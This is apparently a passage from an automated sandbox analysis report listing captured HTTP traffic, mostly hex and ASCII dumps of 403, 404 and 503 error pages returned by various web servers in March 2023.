20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MBFZbL5ezDK0h2Z8Jd%2BgaAmA4a3s85MjHcq92p%2BaBnfVMuk003N95dv2J8BleeoGKAwJwPfxRa6gH6KX5AtwEDlo%2BIYWPRf8HLaUUc2okE%2FC6rLrU0lb4%2Bus6wQyn3yJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc81e7bd06987-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 22 Mar 2023 04:44:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:44:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 22 Mar 2023 04:44:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:51 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hx21zXRVnUKFMouUmKbzR43PFw9jHuIHRTaj%2FMaJo6HRIk5kjpC01qYuAN3EsmirOQ67znFS9zRjFfM6J9PwirBLKsb6o1I9Xc%2B1T4RrxNXgLexCxYCnaHvyCjL0PnNL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc823dfc46987-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:51 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:52 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:54 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1ZgWxQ%2F3JEw4Yv%2BGlHY4coeDF3bHtqSK7jppnA8WTmypnGeEOWI9yU43FlWJQsfIZmXgYJLNxAtiqYFttC1CiiKA4Src07YF7mHVI%2BjV%2BNEGJcgrD26brU%2B1gFk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8392a053650-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:54 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:55 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uXoSE%2FQi8zwr1Zt0fmHyv8eBaNx7uJPqL4jVO9jhK4l1QXb%2FEqUeDJE32XXyJYLNCIa25K%2BZeFvaGPD4I1FfIVknr3%2B5QKs1zbOcTOv0HLXm6yWmhi8Lg%2BXRkQLm1lE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8419dd79bc5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:44:56 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: jxWPGUEm/R0je42lTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 